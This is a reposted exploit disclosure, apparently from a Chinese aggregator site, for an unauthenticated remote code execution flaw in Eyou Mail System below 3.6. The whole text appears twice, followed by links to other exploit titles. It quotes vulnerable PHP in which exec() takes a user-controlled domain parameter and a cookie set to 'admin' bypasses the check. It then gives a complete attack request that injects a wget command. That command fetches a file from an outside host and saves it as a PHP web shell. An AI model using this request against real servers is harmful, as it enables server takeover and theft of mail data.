Eyou Mail System Remote Code Execution
来源:互联网 发布:ug4数控车床编程 编辑:程序博客网 时间:2024/04/29 01:14
Hi!
The Eyou Mail System have a Remote Code Execution in \inc\fuction.php.It affects version below 3.6.
The Vulnerability fuction is get_login_ip_config_file in \inc\fuction.php.
function get_login_ip_config_file($domain, $file) {
$dir = '/var/eyou/Domain/';
$dir_mail = exec('/var/eyou/sbin/hashid '.$domain); //$domain can control by us.
....
}
the other file in \admin\domain\ip_login_set\d_ip_login_get.php.
<?php
...
require_once('inc/domain.config.php');
//ValidateAdmin(); //We donn't need to login in.
$domainname = get_domain(); //Get cookie¡¡¡¡
$allow_file = 'web_login_allow_ip';
$deny_file = 'web_login_deny_ip';
$domain = trim(get('domain')); //$domain from here.
$type = trim(get('type'));¡¡¡¡//Get type
$res = '';
if($domainname !== 'admin' && $domainname !== $domain) { //we just need control $cookie=admin can bypass it and go on.
echo '';
exit;
}
if($type === 'allow') {¡¡//$type any go
$file = $allow_file;
$res .= 'ip_allow&';
} elseif($type === 'deny') {
$file = $deny_file;
$res .= 'ip_deny&';
} else {
echo '';
exit;
}
$file = get_login_ip_config_file($domain, $file);// use the vulnerability fuction
if($file === FALSE) {
echo $res;
exit;
}
Exp:
GET /admin/domain/ip_login_set/d_ip_login_get.php?domain=%3Bwget%20http://conqu3r.paxmac.org/exp.txt%3Bcp%20exp.txt%20exp.php&type=allow HTTP/1.1
Host: mail.xxx.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie:cookie=admin
Connection: keep-alive
Thanks.
The Eyou Mail System have a Remote Code Execution in \inc\fuction.php.It affects version below 3.6.
The Vulnerability fuction is get_login_ip_config_file in \inc\fuction.php.
function get_login_ip_config_file($domain, $file) {
$dir = '/var/eyou/Domain/';
$dir_mail = exec('/var/eyou/sbin/hashid '.$domain); //$domain can control by us.
....
}
the other file in \admin\domain\ip_login_set\d_ip_login_get.php.
<?php
...
require_once('inc/domain.config.php');
//ValidateAdmin(); //We donn't need to login in.
$domainname = get_domain(); //Get cookie¡¡¡¡
$allow_file = 'web_login_allow_ip';
$deny_file = 'web_login_deny_ip';
$domain = trim(get('domain')); //$domain from here.
$type = trim(get('type'));¡¡¡¡//Get type
$res = '';
if($domainname !== 'admin' && $domainname !== $domain) { //we just need control $cookie=admin can bypass it and go on.
echo '';
exit;
}
if($type === 'allow') {¡¡//$type any go
$file = $allow_file;
$res .= 'ip_allow&';
} elseif($type === 'deny') {
$file = $deny_file;
$res .= 'ip_deny&';
} else {
echo '';
exit;
}
$file = get_login_ip_config_file($domain, $file);// use the vulnerability fuction
if($file === FALSE) {
echo $res;
exit;
}
Exp:
GET /admin/domain/ip_login_set/d_ip_login_get.php?domain=%3Bwget%20http://conqu3r.paxmac.org/exp.txt%3Bcp%20exp.txt%20exp.php&type=allow HTTP/1.1
Host: mail.xxx.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie:cookie=admin
Connection: keep-alive
Thanks.
0 0
- Eyou Mail System Remote Code Execution
- Php Endangers - Remote Code Execution
- VNC Keyboard Remote Code Execution
- Bash Remote Code Execution (Shellshock)
- Remote Code Execution as System User on Android 5 Samsung Devices abusing WifiCredService (Hotspot 2
- Internet Explorer (createTextRang) Remote Code Execution Exploit
- JBoss Seam Framework remote code execution
- Zabbix 1.6.2 Remote Code Execution
- Xoops 2.3.2 Remote Code Execution
- PHP Charts 1.0 Remote Code Execution
- joomla 1.5-3.4 Remote Code Execution (exp)
- Debian下安装Eyou Mail Server
- Microsoft WINS Remote Code Execution Exploit (MS04-045)
- Vulnerability in Graphics Rendering Engine Allows Remote Code Execution
- Microsoft Office Multiple Remote Code Execution Vulnerabilities (MS06-012)
- Microsoft Internet Explorer (mshtml.dll) - Remote Code Execution
- Zero Day MS Internet Explorer Remote "CreateTextRange()" Code Execution
- Microsoft Internet Explorer (mshtml.dll) Remote Code Execution
- 时间复杂度的概念
- ORACLE修改数据结构语句
- linux ps
- poj2817(N!的状压DP)
- 题目1116:加减乘除
- Eyou Mail System Remote Code Execution
- 软件质量评价标准
- Android入门
- ORACLE的SQL集锦
- zoj 3742 Bellywhite's Algorithm Homework
- hdu1157解题报告
- 简单的JDK环境配置
- 2013总结 && 2014展望
- 深入分析java web 技术内幕_笔记_三